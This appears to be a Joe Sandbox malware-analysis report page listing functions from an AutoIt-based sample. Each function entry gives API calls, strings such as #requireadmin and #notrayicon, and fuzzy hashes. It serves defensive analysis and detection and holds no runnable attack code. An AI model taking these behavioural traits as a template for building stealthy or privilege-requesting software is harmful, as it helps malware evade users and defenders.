Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *j|
API String ID: 2173805711-205169694
Opcode ID: 06118852a48782440dbf7ef2452e1fe458e7be01b4a424cc0acaedae052922ae
Instruction ID: 567948f0c8024a35d8f6c9034400f78b9b218a8cf7bd9461787c92ddb5e97770
Opcode Fuzzy Hash: 06118852a48782440dbf7ef2452e1fe458e7be01b4a424cc0acaedae052922ae
Instruction Fuzzy Hash: 1331B171604245DFCB05AFA4E895EBD37B5FF8A700B10049CFA039B2A1C77C9912DB94

Function 007E304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007E335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,007E3077,?,?), ref: 007E3378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 007E307A
_wcslen.LIBCMT ref: 007E309B
htons.WSOCK32(00000000,?,?,00000000), ref: 007E3106

Strings

255.255.255.255, xrefs: 007E3095, 007E309A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: c096929859a81508903daf0c232e9a99572165e15593b007bdea63619bae6006
Instruction ID: 0ed40e848a34739460767754bd9a8d6e19a0168adb1c5f25bd47b7155b5372bf
Opcode Fuzzy Hash: c096929859a81508903daf0c232e9a99572165e15593b007bdea63619bae6006
Instruction Fuzzy Hash: 76310735201285DFCB20CF6AC589E6977E1EF58314F248059E9158B392DB3AEF45C760

Function 007F4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007F4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007F4713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007F471A

Strings

msctls_updown32, xrefs: 007F4684

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: a3cfa9d5aac70fb2142f406d49b601dd305f2f79616fe54871bc5f582eb71237
Instruction ID: 6d6ce3064120a6df82b880448a3f9d5d0a5bf72ce3e55f4acb839f3e299f40ef
Opcode Fuzzy Hash: a3cfa9d5aac70fb2142f406d49b601dd305f2f79616fe54871bc5f582eb71237
Instruction Fuzzy Hash: 11215EB5604208AFDB11EF64DC85DB737ADEB8A7A8B040459FA00DB351CB34EC11CA60

Function 007C95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007C961D

Strings

#requireadmin, xrefs: 007C95D9
#notrayicon, xrefs: 007C95B7
#OnAutoItStartRegister, xrefs: 007C95F3

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 6794bafdf8655116c2a72de3f7f1804cf1ce67591609f49fb719175dc4ad800d
Instruction ID: 315dd5cb8c11f78323674bae37982c808f25fd38a319ba784e4433b4bb4a7c66
Opcode Fuzzy Hash: 6794bafdf8655116c2a72de3f7f1804cf1ce67591609f49fb719175dc4ad800d
Instruction Fuzzy Hash: EC216872204510A6C371BB24DC0EFB77398AF51300F50402EFB5AA71C1EBACAD51C395

Function 007F37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007F3840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007F3850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007F3876

Strings

Listbox, xrefs: 007F380F

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: d952587455e58736a060201fbb469b2e7cc8512dfcc0600720b1a5987e6f6aa6
Instruction ID: ca75cfcb7d5c0a3eff0500b77d07583e2e1493bfd6b4400a6ff5efdca53f5d00
Opcode Fuzzy Hash: d952587455e58736a060201fbb469b2e7cc8512dfcc0600720b1a5987e6f6aa6
Instruction Fuzzy Hash: FB21807261011CBBEF119F54DC85EBB376AEF897A0F118124FA159B290C679DC51C7A0

Function 007C223F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007C2258

Part of subcall function 00766B57: _wcslen.LIBCMT ref: 00766B6A

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007C228A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007C22CA

Strings

@U=u, xrefs: 007C2258, 007C228A, 007C22CA

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID: @U=u
API String ID: 763830540-2594219639
Opcode ID: bfcf1ff6507330ed96f697438ff423dea4b646bafdf895333ce3f2aecad7346a
Instruction ID: cc18fc3be1efc0f92dbc5cb6accc1d8976bddb209a5223a6dda174bffa8dfdc3
Opcode Fuzzy Hash: bfcf1ff6507330ed96f697438ff423dea4b646bafdf895333ce3f2aecad7346a
Instruction Fuzzy Hash: 9F21A771700248EBDB11AB558D4DFEE3BA9EB59710F04802DFE06D7282D7789D46C7A1

Function 007D49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007D4A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007D4A5C
SetErrorMode.KERNEL32(00000000,?,?,007FCC08), ref: 007D4AD0

Strings

%lu, xrefs: 007D4A6F

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: b1771918ee93c326246b6f961868026aaf5d6f7b5650b61316d5413276967991
Instruction ID: 8bbb5c305461b61bccfd74d934ee9b569963cd94f2581e66c8886a9cfc9b7a95
Opcode Fuzzy Hash: b1771918ee93c326246b6f961868026aaf5d6f7b5650b61316d5413276967991
Instruction Fuzzy Hash: 2C318E75A00108EFDB10DF64C985EAA7BF8EF48308F1480A9E909DB352D779EE45CB61

Function 007C1B2C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 007C1B4F
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007C1B61
SendMessageW.USER32(?,0000000D,?,00000000), ref: 007C1B99

Strings

@U=u, xrefs: 007C1B99

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 6f53c738ec466a3e66d675f2d9d5ebecd6c7a11bc52b4c28338dba61423ccb41
Instruction ID: 174620e53eabab30da412e06205024eb6cb516c62779e253dac19083f4fc983c
Opcode Fuzzy Hash: 6f53c738ec466a3e66d675f2d9d5ebecd6c7a11bc52b4c28338dba61423ccb41
Instruction Fuzzy Hash: 9921AE72600118BFDF11DFA8C941EAEB7FAAF45340F1004AEE509E3291EA75AE40CB94

Function 007E0CD5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000402,00000000,00000000), ref: 007E0D24
SendMessageW.USER32(0000000C,00000000,?), ref: 007E0D65
SendMessageW.USER32(0000000C,00000000,?), ref: 007E0D8D

Strings

@U=u, xrefs: 007E0D24, 007E0D65, 007E0D8D

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 9923aa6c5e61dffe185cf4fa53eab0192b6c8b757ee556d32ad8b2dba0aa813d
Instruction ID: 76655b088f181b883718c7d904e11885d0bf58988e8f260ae075eb83d48d7da3
Opcode Fuzzy Hash: 9923aa6c5e61dffe185cf4fa53eab0192b6c8b757ee556d32ad8b2dba0aa813d
Instruction Fuzzy Hash: E3212935200500EFD711EB69DD89D6AB7E6FB49710B008495E90ADBA72D778FC60CB90

Function 007F41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007F424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007F4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007F4271

Strings

msctls_trackbar32, xrefs: 007F4226

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: ef76a0a9f14f093d24410bb07b897133019a1eeeef3de30fea0e287058f8ae4c
Instruction ID: 53bb7b60235eb22bf869b56e07552934c998c1884ff0736877cf26040c05c8a3
Opcode Fuzzy Hash: ef76a0a9f14f093d24410bb07b897133019a1eeeef3de30fea0e287058f8ae4c
Instruction Fuzzy Hash: C211CE3124024CBFEF205E29CC06FBB3BA8FB85B64F010528FA55E22A0D275D8519B20

Function 007C2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00766B57: _wcslen.LIBCMT ref: 00766B6A

Part of subcall function 007C2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 007C2DC5
Part of subcall function 007C2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 007C2DD6
Part of subcall function 007C2DA7: GetCurrentThreadId.KERNEL32 ref: 007C2DDD
Part of subcall function 007C2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 007C2DE4

GetFocus.USER32 ref: 007C2F78

Part of subcall function 007C2DEE: GetParent.USER32(00000000), ref: 007C2DF9

GetClassNameW.USER32(?,?,00000100), ref: 007C2FC3
EnumChildWindows.USER32(?,007C303B), ref: 007C2FEB

Strings

%s%d, xrefs: 007C2FFF

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 00c7488c4a02cec29e0315834e491b33329c502252b876e75f49e1bd0df8576b
Instruction ID: a890871f8b12808464f2fca668a499569ac080810d957341a1e7ea6b1491780c
Opcode Fuzzy Hash: 00c7488c4a02cec29e0315834e491b33329c502252b876e75f49e1bd0df8576b
Instruction Fuzzy Hash: 581193B1700209EBCF556F609D8AFED376AAF94304F04807DB90ADB292DE785949CB60

Function 007F3429 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 007F34AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007F34BA

Strings

@U=u, xrefs: 007F34BA
edit, xrefs: 007F348F

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: @U=u$edit
API String ID: 2978978980-590756393
Opcode ID: af438e55a117d5986abd40238c32ff7bbd240b28b4d5974ad517ad8bdffcdc54
Instruction ID: 6f9980a7113016662621f766e85209d6afb13fc39420735c28322488fc195211
Opcode Fuzzy Hash: af438e55a117d5986abd40238c32ff7bbd240b28b4d5974ad517ad8bdffcdc54
Instruction Fuzzy Hash: 6E118C7110024CEBEF128E64DC44ABB376AEB05774F508724FA61932E0C779EC51AB64

Function 007C1CDE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

Part of subcall function 007C3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 007C3CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007C1D4C

Strings

ComboBox, xrefs: 007C1CEB
@U=u, xrefs: 007C1D4C
ListBox, xrefs: 007C1D16

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: @U=u$ComboBox$ListBox
API String ID: 624084870-2258501812
Opcode ID: 7252a4c240d449b039a706b26745691570112fad603d7cb08c0a183b50ac25df
Instruction ID: 23b94519d575cfb8ecfb09ce8b64ffdd18cd8c18fce677a0e886183e64a0f3f1
Opcode Fuzzy Hash: 7252a4c240d449b039a706b26745691570112fad603d7cb08c0a183b50ac25df
Instruction Fuzzy Hash: 2401B971741114ABCB14EBA4CD55DFE7368FB57350B54091DB833573C2DA3859088660

Function 007C1BD8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

Part of subcall function 007C3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 007C3CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 007C1C46

Strings

ComboBox, xrefs: 007C1BE5
@U=u, xrefs: 007C1C46
ListBox, xrefs: 007C1C10

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: @U=u$ComboBox$ListBox
API String ID: 624084870-2258501812
Opcode ID: 25574149a43187e1b3aea1a040890e79398aaa410fa3f4bdc1dd2fd632361b68
Instruction ID: 66e7b6617da1633042f569c23ab57b730c0fa03ecae04bdee816a6cd66e8ab18
Opcode Fuzzy Hash: 25574149a43187e1b3aea1a040890e79398aaa410fa3f4bdc1dd2fd632361b68
Instruction Fuzzy Hash: A401AC75681104A7CB14E7A0CA55FFF77AC9B12340F54002DB916772C2EA3C9E18D671

Function 007C1C5C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

Part of subcall function 007C3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 007C3CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 007C1CC8

Strings

ComboBox, xrefs: 007C1C69
@U=u, xrefs: 007C1CC8
ListBox, xrefs: 007C1C94

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: @U=u$ComboBox$ListBox
API String ID: 624084870-2258501812
Opcode ID: 27f55773b2618acff164ddbf294e927942ebfe50ad8c9f8af6aa40309254fe49
Instruction ID: a317125c258d37fa0fb82626ca60e543e4289c00b77d1545e87291f02924d2e4
Opcode Fuzzy Hash: 27f55773b2618acff164ddbf294e927942ebfe50ad8c9f8af6aa40309254fe49
Instruction Fuzzy Hash: 9901A271680118A7CB24EBA0CB15FFE73ACAB12340F54002DB912B3282EA3C9F18D671

Function 007F5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007F58C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007F58EE
DrawMenuBar.USER32(?), ref: 007F58FD

Strings

0, xrefs: 007F588F

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 9f9cd71811841b3fbea605692e224be7bc407ce10f6042071d6e29d3a8fcea01
Instruction ID: 16714c7b84ee069ebbf2fd8e31e93d13b87d242f467171fa58061659a1b6fff6
Opcode Fuzzy Hash: 9f9cd71811841b3fbea605692e224be7bc407ce10f6042071d6e29d3a8fcea01
Instruction Fuzzy Hash: AA011B3150421CEEDB219F21DC48BBEBBB4FF45361F10C099EA49D6251DB789A94EF21

Function 007F7803 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,008318B0,007FA364,000000FC,?,00000000,00000000,?,?,?,007B76CF,?,?,?,?,?), ref: 007F7805
GetFocus.USER32 ref: 007F780D

Part of subcall function 00779BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00779BB2

Part of subcall function 00779944: GetWindowLongW.USER32(?,000000EB), ref: 00779952

SendMessageW.USER32(0121E8F8,000000B0,000001BC,000001C0), ref: 007F787A

Strings

@U=u, xrefs: 007F787A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: @U=u
API String ID: 3601265619-2594219639
Opcode ID: de1c279f50d5f4e547a4abfe2f1ea75c65c73190f639d0669d3785aaa9d37e8e
Instruction ID: 7beda34e68f7fa45d7051e1545363a1779f76d9100e42d66bd9273a8c8058221
Opcode Fuzzy Hash: de1c279f50d5f4e547a4abfe2f1ea75c65c73190f639d0669d3785aaa9d37e8e
Instruction Fuzzy Hash: 17017C31605104CFDB29DB28D85CAB677E6FFCA360F184669E6158B3E0CB356C06CB90

Function 007C007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID:
API String ID:
